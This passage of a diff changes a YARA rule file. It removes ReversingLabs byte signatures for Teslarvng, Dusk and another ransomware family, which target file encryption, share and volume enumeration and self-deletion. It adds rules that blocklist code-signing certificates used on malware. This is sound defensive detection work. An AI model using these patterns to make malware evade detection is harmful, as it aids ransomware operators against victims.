-            ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ??
-            75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5
-            5D C2
-        }
-		$encrypt_files_p1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ??
-            ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75
-            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ??
-            83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ??
-            8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89
-            45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B
-            CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84
-            ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ??
-            ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89
-        }
-		$encrypt_files_p2 = {
-            75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ??
-            ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D
-            ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70
-            ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15
-            ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52
-            8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF
-            15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2
-            8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3
-        }
-		$find_volumes = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ??
-            ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75
-            ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66
-            83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ??
-            33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ??
-            ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" ) and 1650931200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Teslarvng ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7045b13e-95a5-54da-b540-75d464e7673d"
-		date = "2020-12-14"
-		modified = "2020-12-14"
+		id = "0f9fa6c6-372d-5948-94ba-9e3fee956647"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16456-L16472"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98"
+		logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Teslarvng"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50
-            8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75
-            ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45
-            ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0
-            83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B
-            C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85
-            ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51
-        }
-		$encrypt_files_p2 = {
-            FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-            8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33
-            C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47
-            ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45
-            ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ??
-            ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D 8B E3 5B C2
-        }
-		$find_files = {
-            FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6
-            74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B
-            C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B
-            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ??
-            85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45
-            ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F
-            84 ?? ?? ?? ?? FF D6 8B D0
-        }
-		$enum_shares_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D
-            75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ??
-            ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89
-            45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ??
-            83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F
-            43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43
-            4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ??
-            ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66
-        }
-		$enum_shares_p2 = {
-            0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66
-            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ??
-            66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45
-            ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ??
-            ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ??
-            8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11
-            85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0
-        }
-		$enum_shares_p3 = {
-            8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ??
-            3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ??
-            0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89
-            45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ??
-            75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ??
-            8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dusk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cde30f40-f13c-53da-8656-cc293433aa36"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16474-L16490"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7"
+		logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dusk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ??
-            0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
-            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
-            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
-            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$dusk_delete_itself = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16
-            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ??
-            ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ??
-            ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files = {
-            20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ??
-            72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ??
-            ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28
-            ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D
-            1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ??
-            28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $dusk_delete_itself )
